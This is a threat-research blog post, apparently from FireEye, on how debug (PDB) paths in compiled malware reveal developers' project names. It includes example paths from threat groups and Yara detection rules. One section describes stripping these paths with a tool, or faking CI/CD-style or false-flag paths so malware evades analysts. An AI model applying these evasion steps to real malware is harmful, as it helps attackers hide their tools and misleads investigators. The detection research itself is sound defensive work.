Monthly Archives: August 2019

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab and answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small, but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world but in order to make use of our stored data and retrieve it in an efficient manner, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names. Often users name folders and files based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that when met are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.


A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file

Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project Visual Studio in a default “Debug” configuration (Figure 3) and writes out Test.exe and Test.pdb to a subfolder (Figure 4).

Figure 3: The Visual Studio output of a default compiling configuration

Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.

Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During the compilation, the linker program associates the PDB file with the built executable by adding an entry into the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView and so the PDB path is embedded under IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file Test.pdb while debugging Test.exe.

Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:




"RSDS" header


16-byte Globally Unique Identifier


"age" (incrementing # of revisions)


PDB path, null terminated

Figure 7: Structure of CodeView debug directory information

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths, those that are fully qualified directory paths and those that are partially qualified, that specify the name of the PDB file only. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:


A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:


Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, so the fully qualified path is unnecessary in the symbol path (the PDB path). For the purposes of this research, we will be mostly looking at fully qualified PDB paths.

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we figured that these conventions would hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about these things is good, bad and ugly. What is normal, and what is abnormal? What is globally prevalent and what is rare? What are malware authors doing that is different from what non-malware developers are doing? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.

Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword

Figure 9: Template Yara rule to search for executables with PDB files matching a keyword

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus, and we found plenty of common PDB path keywords that seemed to transcend different sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths, with represented malware families and threat groups where at least one sample has the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence


Families and Groups Observed

Example PDB Path


APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765




APT1, UNC776, UNC251. UNC1131





APT41, APT34, APT37, UNC52, UNC1131, APT40






UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822

C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb




APT10, APT34, APT21, UNC1289, UNC1450

C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb




APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031

Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb




UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849

D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb




UNC1030, APT39, APT34, FIN6





UNC1172, APT39, UNC822






APT17, UNC208, UNC276






UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8

C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb





APT26, APT40, UNC213, APT26, UNC44, UNC53, UNC282





UNC842, UNC1197, UNC1040, UNC969

D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb





UNC606, APT10, APT34, APT41, UNC373, APT31, APT34, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575

E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb




UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53





APT37, UNC82, UNC1095, APT1, APT40

D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb




UNC915, UNC632, UNC1149, APT28, UNC878

C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb





UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559










FIN7, UNC583, UNC822, UNC1120





UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559


Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that are typically used to describe malware are strong enough to raise red flags, but there are other common terms or features in PDB paths that may signal that an executable is compiled in a non-enterprise setting. For example, any PDB path containing “Users” directory can tell you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker or lower in fidelity than “shellcode” but as we demonstrate below, these terms are indeed present in lots of malware and can be used for weak detection signals.

PDB Path Term Prevalence


Families and Groups Observed

Example PDB Path



APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562

C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb





(Visual Studio default project names)


APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507


New Folder


APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559

c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb



UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289

D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb



APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352


Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered on a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
        author = "@stvemillertime"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
        author = "@stvemillertime"
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3

Outside of a Debug Section

When a file is compiled the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables, and is likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry, and if it is zero we can presume that there is no debug entry and thus the presence of a CodeView PDB path indicates that there is a subfile.

rule ConventionEngine_Anomaly_OutsideOfDebug
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................

There are a few possibilities of how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering, for the purposes of removing toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manual editing and overwriting via hex editor is that doing so is laborious and may introduce other static anomalies such as checksum errors.

The next easiest way is to use a utility designed to wipe out debug artifacts from executables. One stellar example of this is “peupdate” which is designed not only to strip or fabricate the PDB path information, but can also recalculate the checksum, and eliminate Rich headers.  Below we demonstrate use of peupdate to clear the PDB path.

Figure 12: Using peupdate to clear the PDB path information from a sample of malware

Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence


Families and Groups Observed


Non-Ascii Characters

APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT24, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969


Multi Path in Single File


APT1, APT2, APT17, APT5, APT20, APT21, APT26, APT34, APT36, APT37, APT40, APT41, UNC27, UNC53, UNC218, UNC251, UNC432, UNC521, UNC718, UNC776, UNC875, UNC878, UNC969, UNC1031, UNC1040, UNC1065, UNC1092, UNC1095, UNC1166, UNC1183, UNC1289, UNC1374, UNC1443, UNC1450, UNC1495

Single Sample of TRICKBOT:



Outside of Debug Section


APT5, APT6, APT9, APT10, APT17, APT22, APT24, APT26, APT27, APT29, APT30, APT34, APT35, APT36, APT37, APT40, APT41, UNC20, UNC27, UNC39, UNC53, UNC69, UNC74, UNC105, UNC124, UNC125, UNC147, UNC213, UNC215, UNC218, UNC227, UNC251, UNC276, UNC282, UNC307, UNC308, UNC347, UNC407, UNC565, UNC583, UNC587, UNC589, UNC631, UNC707, UNC718, UNC775, UNC776, UNC779, UNC842, UNC869, UNC875, UNC875, UNC924, UNC1040, UNC1080, UNC1148, UNC1152, UNC1225, UNC1251, UNC1428, UNC1450, UNC1486, UNC1575


Nulled Out PDB Paths


APT41, UNC776, UNC229, UNC177, UNC1267, UNC878, UNC1511




Figure 14: A selection of anomalies in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Outliers, Oddities, Exceptions and Other Shenanigans

The internet is a weird place, and at a big enough scale, you end up seeing things that you never thought you would. Things that deviate from the norms, things that shirk the standards, things that utterly defy explanation. We expect PDB paths to look a certain way, but we’ve run across several samples that did not, and we’re not always sure why. Many of these samples below may be results of errors, corruption, obfuscation, or various forms of intentional manipulation. We’re demonstrating them here to show that if you are attempting PDB path parsing or detection, you need to understand the variety of paths in the wild and prepare for shenanigans galore. Each of these examples are from confirmed malware samples.


Example PDB Paths

Unicode error

Text Path: C^\Users\DELL\Desktop\interne.2.pdb

Raw Path: 435E5C55 73657273 5C44454C 4C5C4465 736B746F 705C696E 7465726E 6598322E 706462


Text Path: Cj\Users\hacker messan\Deskto \Server111.pdb

Raw Path: 436A5C55 73657273 5C686163 6B657220 6D657373 616E5C44 65736B74 6FA05C53 65727665 72313131 2E706462

Nothing but space

Text Path:                                                         

Full Raw: 52534453 7A7F54BF BAC9DE45 89DC995F F09D2327 0A000000 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202000

Spaced out

Text Path: D:\                                 .pdb

Full Raw: 52534453 A7FBBBFE 5C41A545 896EF92F 71CD1F08 01000000 443A5C20 20202020 20202020 20202020 20202020 20202020 20202020 20202020 20202020 2E706462 00

Nothin’ but null

Text Path: <null bytes only>

Full Raw: 52534453 97272434 3BACFA42 B2DAEE99 FAB00902 01000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000

Random characters

Text Path: Lmd9knkjasdLmd9knkjasLmd9knkAaGc.pdb

Random path

Text Path: G:\givgLxNzKzUt\TcyaxiavDCiu\bGGiYrco\QNfWgtSs\auaXaWyjgmPqd.pdb

Word soup

Text Path: c:\Busy\molecule\Blue\Valley\Steel\King\enemy\Himyard.pdb

Mixed doubles



Text Path: 1.pdb

No .pdb

Text Path: a

Full Raw: 52534453 ED86CA3D 6C677946 822E668F F48B0F9D 01000000 6100

Long and weird with repeated character

Text Path: ªªªªªªªªªªªªªªªªªªªªtinjs\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaae.pdb

Full Raw: 52534453 DD947C2F 6B32544C 8C3ACB2E C7C39F45 01000000 AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA AAAAAAAA 74696E6A 735C6161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 652E7064 6200

No idea

Text Path: n:.Lí..×ÖòÒ.

Full Raw: 52534453 5A2D831D CB4DCF1E 4A05F51B 94992AA0 B7CFEE32 6E3AAD4C ED1A1DD7 D6F2D29E 00

Forward slashes and no drive letter

Text Path: /Users/user/Documents/GitHub/SharpWMI/SharpWMI/obj/Debug/SharpWMI.pdb

Network share

Text path:

\\vmware-host\shared folders\Decrypter\Decrypter\obj\Release\Decrypter.pdb

Non-Latin drive letter

We haven’t seen this yet, but it’s only a matter of time until you can have an emoji as a drive letter.

Figure 15: A selection of PDB paths shenanigans with examples

Betwixt Nerf Herders and Elite Operators

There are many differences between apex threat actors and the rest, even if all successfully perform intrusion operations. Groups that exercise good OPSEC in some campaigns may have bad OPSEC in others. APT36 has hundreds of leaked PDB paths, whereas APT30 has a minimal PDB path footprint, while APT38 is a ghost.

When PDB paths are present, the types of keywords, terms, and other string items present in PDB paths are all on a spectrum of professionalism and sophistication. On one end we’re seeing “njRAT-FUD 0.3” and “1337 h4ckbot” and on the other end we’re seeing “minidionis” and “msrstd”.

The trendy critique of string-based detection goes something like “advanced adversaries would never act so carelessly; they’ll obfuscate and evade your naïve and brittle signatures.” In the tables above for PDB path keywords, terms and anomalies, we think we’ve shown that bona fide APT/FIN groups, state-sponsored adversaries, and the best-of-the-best attackers do sometimes slip up and give us an opportunity for detection.

Let’s call out some specific examples from boutique malware from some of the more advanced threat groups.

Equation Group

Some Equation Group samples show full PDB paths that indicate that some of the malware was compiled in debug mode on workstations or virtual machines used for development.

Other Equation Group samples have partially qualified PDB paths that represent something less obvious. These standalone PDB names may reflect a more tailored, multi-developer environment, where it wouldn’t make sense to specify a fully qualified PDB path for a single developer system. Instead, the linker is instructed to write only the PDB file name in the built executable. Still, these PDB paths are unique to their malware samples:

  • tdip.pdb
  • volrec.pdb
  • msrstd.pdb


Deeming a piece of malware a “backdoor” is increasingly passé. Calling a piece of malware an “implant” is the new hotness, and the general public may be adopting this nouveau nomenclature long after purported Western governments. In this component of the Regin platform, we see a developer that was way ahead of the curve:


Let’s not forget APT29, whose brazen worldwide intrusion sprees often involve pieces of creative, elaborate, and stealthy malware. APT29 is amongst the better groups at staying quiet, but in thousands of pieces of malware, these normally disciplined operators did leak a few PDB paths such as:

  • c:\Users\developer\Desktop\unmodified_netimplant\minidionis\minidionis\obj\Debug\minidionis.pdb
  • C:\Projects\nemesis-gemina\nemesis\bin\carriers\ezlzma_x86_exe.pdb

Even when the premier outfits don’t use the glaring keywords, there may still be some string terms, anomalies and unique values present in PDB paths that each represent an opportunity for detection.


We extract and index all PDB paths from all executables so we can easily search and spelunk through our data. But not everyone has it that easy, so we cranked out a quick collection of nearly 100 Yara rules for PDB path keywords, terms and anomalies that we believe researchers and analysts can use to detect evil. We named this collection of rules “ConventionEngine” after the industry jokes that security vendors like to talk about their elite detection “engines,” but behind the green curtain they’re all just a code spaghetti mess of scripts and signatures, which this absolutely started as.

Instead of tight production “signatures,” you can think of these as “weak signals” or “discovery rules” that are meant to build haystacks of varying size and fidelity for analysts to hunt through. Those rules with a low signal-to-noise ratio (SNR) could be fed to automated systems for logging or contextualization of file objects, whereas rules with a higher SNR could be fed directly to analysts for review or investigation.

Our adversaries are human. They err. And when they do, we can catch them. We are pleased to release ConventionEngine rules for anyone to use in that effort. Together these rules cover samples from over 300 named malware families, hundreds of unnamed malware families, 39 different APT and FIN threat groups, and over 200 UNC (uncategorized) groups of activity.

We hope you can use these rules as templates, or as starting points for further PDB path detection ideas. There’s plenty of room for additional keywords, terms, and anomalies. Be advised, whether for detection or hunting or merely for context, you will need to tune and add additional logic to each of these rules to make the size of the resulting haystacks appropriate for your purposes, your operations and the technology within your organization. When judiciously implemented, we believe these rules can enrich analysis and detect things that are missed elsewhere.

PDB Paths for Intelligence Teams

Gettin' Lucky with APT31

During an incident response investigation, we found an APT31 account on Github being used for staging malware files and for malware communications. The intrusion operators using this account weren’t shy of putting full code packages right into the repositories and we were able to recover actual PDB files associated with multiple malware ecosystems. Using the actual PDB files, we were able to see the full directory paths of the raw malware source code, representing a considerable intelligence gain about the malware original development environment. We used what we found in the PDB itself to search for other files related to this malware author.

Finding Malware Source Code Using PDBs

Malware PDBs themselves are easier to find than one may think. Sure, sometimes the authors are kind enough to leave everything up on Github. But there are some other occasions too: sometimes malware source code will get inadvertently flagged by antivirus or endpoint detection and response (EDR) agents; sometimes malware source code will be left in open directories; and sometimes malware source code will get uploaded to the big malware repositories.

You can find malware source code by looking for things like Visual Studio solution files, or simply with Yara rules looking for PDB files in archives that have some non-zero detection rate or other metadata that raises the likelihood that some component in the archive is indeed malicious.

rule PDB_Header_V2
        description = "This looks for PDB files based on headers.
        //$string = "Microsoft C/C++ program database 2.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 70726F67 72616D20 64617461 62617365 20322E30 300D0A}
        $hex at 0
rule PDB_Header_V7
        description = "This looks for PDB files based on headers.
        //$string = "Microsoft C/C++ MSF 7.00"
        $hex = {4D696372 6F736F66 7420432F 432B2B20 4D534620 372E3030}
        $hex at 0

PDB Paths for Offensive Teams

FireEye has confirmed individual attribution to bona fide threat actors and red teamers based in part on leaked PDB paths in malware samples. The broader analyst community often uses PDB paths for clustering and pivoting to related malware families and while building a case for attribution, tracking, or pursuit of malware developers. Naturally, red team and offensive operators should be aware of the artifacts that are left behind during the compilation process and abstain from compiling with symbol generation enabled – basically, remember to practice good OPSEC on your implants. That said, there is an opportunity for creating artificial PDB paths should one wish to intentionally introduce this artifact.

Making PDB Paths Appear More “Legitimate”

One notable differentiator between malware and non-malware is that malware is typically not developed in an “enterprise” or “commercial” software development setting. The difference here is that in large development settings, software engineers are working on big projects together through productivity tools, and the software is constantly updated and rebuilt through automated “continuous integration” (CI) or “continuous delivery” (CD) suites such as Jenkins and TeamCity.  This means that when PDB paths are present in legitimate enterprise software packages, they often have toolmarks showing their compile path on a CI/CD build server.

Here are some examples of PDB paths of legitimate software executables built in a CI/CD environment:

  • D:\Jenkins\workspace\QA_Build_5_19_ServerEx_win32\_buildoutput\ServerEx\Win32\Release\_symbols\keysvc.pdb
  • D:\bamboo-agent-home\xml-data\build-dir\MC-MCSQ1-JOB1\src\MobilePrint\obj\x86\Release\MobilePrint.pdb
  • C:\TeamCity\BuildAgent\work\714c88d7aeacd752\Build\Release\cs.pdb

We do not discount the fact that some malware developers are using CI/CD build environments. We know that some threat actors and malware authors are indeed adopting contemporary enterprise development processes, but malware PDBs like this example are extraordinarily rare:

  • c:\users\builder\bamboo~1\xml-data\build-~1\trm-pa~1\agent\window~1\rootkit\Output\i386\KScan.pdb
Specifying Custom PDB Paths in Visual Studio

Specifying a custom path for a PDB file is not uncommon in the development world. An offensive or red team operator may wish to specify a fake PDB path and can do so easily using compiler linking options.

As our example malware author “smiller” learns and hones their tradecraft, they may adopt a stealthier approach and choose to include one of those more “legitimate” looking PDB paths in new malware compilations.

Take smiller’s example malware project located at the path:


Figure 16: hellol.cpp code shown in Visual Studio with debug build information

This project compiled in Debug configuration by default places both the hellol.exe file and the hellol.pdb file under


Figure 17: hellol.exe and hellol.pdb, compiled by debug configuration default into its resident folder

It’s easy to change the properties of this project and manually specify the generation path of the PDB file. From the Visual Studio taskbar, select Project > Properties, then in the side pane select Linker > Debugging and fill the option box for “Generate Program Database File.” This option accepts Visual Studio macros so there is plenty of flexibility for scripting and creating custom build configurations for falsifying or randomizing PDB paths.

Figure 18: hellol project Properties showing defaults for the PDB path

Figure 19: hellol project Properties now showing a manually specified path for the (fake) PDB path

When we examine the raw ConsoleApplication1.exe, we can see at the byte level that the linker has included debug information in the executable specifying our designated PDB path, which of course is not real. Or if built at the command line, you could specify /PDBALTPATH which can create a PDB file name that is does not rely on the file structure of the build computer.

Figure 20: Rebuilt hellol.exe as seen through the PEview utility, which shows us the fake PDB path in the IMAGE_DEBUG_TYPE_CODEVIEW directory of the executable

An offensive or red team operator could intentionally include a PDB path in a piece of malware, making the executable appear to be compiled on a CI/CD server which could help the malware fly under the radar. Additionally, an operator could include a PDB path or strings associated with a known malware family or threat group to confound analysts. Why not throw in a small homage to one of your favorite malware operators or authors, such as the infamous APT33 persona xman_1365_x? Or perhaps throw in a “\Homework\CS1101\” to make the activity seem more academic? For whatever reason, if there is PDB manipulation to be done, it is generally doable with common software development tools.

The Glory and the Nothing of a (Malware) Name

In the context of PDB paths and malware author naming conventions, it is important to acknowledge the interdependent (and often circular) nature of “offense” and “defense.” Which came first, a defender calling a piece of malware a “trojan” or a malware author naming their code project a “trojan”? Some malware is inspired by prior work. An author names a code project “MIMIKATZ”, and years later there are hundreds of related projects and scripts with derivative names.

Although definitions may vary, we see that both the offensive and defensive sides characterize the functionality or role of a piece of malware using much of the same vernacular and inspiration. We suspect this began with “virus” and that the array of granular, descriptive terms will continue to grow as public discourse advances the malware taxonomy. Who would have suspected that how we talked about malware would ultimately lead to the possibility detecting it? After all, would a rootkit by any other name be as evil? Somewhere, a scholar is beaming with wonder at the intersection of malware and linguistics.


If by now you’re thinking this is all kind of silly, don’t worry, you’re in good company. PDB paths are indeed a wonky attribute of a file. The mere presence of these paths in an executable is by no means evil, yet when these paths are present in pieces of malware, they usually represent acts of operational indiscretion. The idea of detecting malware based on PDB paths is kind of like detecting a robber based on what type of hat a person is wearing, if they’re wearing one at all.

We have been historically successful in using PDB paths mostly as an analytical pivot, to help us cluster malware families and track malware developers. When we began to study PDB paths holistically, we noticed that many malware authors were using many of the same naming conventions for their folders and project files. They were naming their malware projects after the functionality of the malware itself, and they routinely label their projects with unique, descriptive language.

We found that many malware authors and operators leaked PDB paths that described the functionality of the malware itself and gave us insight into the development environment. Furthermore, outside of the descriptors of the malware development files and environment, when PDB files are present, we identified anomalies that help us identify files that are more likely to be circumstantially interesting. There is room for red team and offensive operators to improve their tradecraft by falsifying PDB paths for purposes of stealth or razzle-dazzle.

We remain optimistic that we can squeeze some juice from PDB paths when they are present. A survey of about 2200 named malware families (including all samples from 41 APT and 10 FIN groups and a couple million other uncategorized executables) shows that PDB paths are present in malware about five percent of the time. Imagine if you could have a detection “backup plan” for five plus percent of malware, using a feature that is itself inherently non-malicious. That’s kind of cool, right?

Future Work on Scaling PDB Path Classification

Our ConventionEngine rule pack for PDB path keyword, term and anomaly detection has been fun and found tons of malware that would have otherwise been missed. But there are a lot of PDB paths in malware that do not have such obvious keywords, and so our manual, cherry-picking, and extraordinarily laborious approach doesn’t scale.

Stay tuned for the next part of our blog series! In Part Deux, we explore scalable solutions for PDB path feature generalization and approaches for classification. We believe that data science approaches will better enable us to surface PDB paths with unique and interesting values and move towards a classification solution without any rules whatsoever.

Recommended Reading and Resources

Inspiring Research
Debugging and Symbols
Debug Directory and CodeView
Debugging and Visual Studio
PDB File Structure
PDB File Tools
ConventionEngine Rules

After “No”

Part of a privacy professional’s job is the development of processes and policies to manage the consent of an individual. When someone does consent to their information being processed, there should be a means to record that they have done so and also a way for that individual to revoke their consent or opt-out of […]

The post After “No” appeared first on Privacy Ref.

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

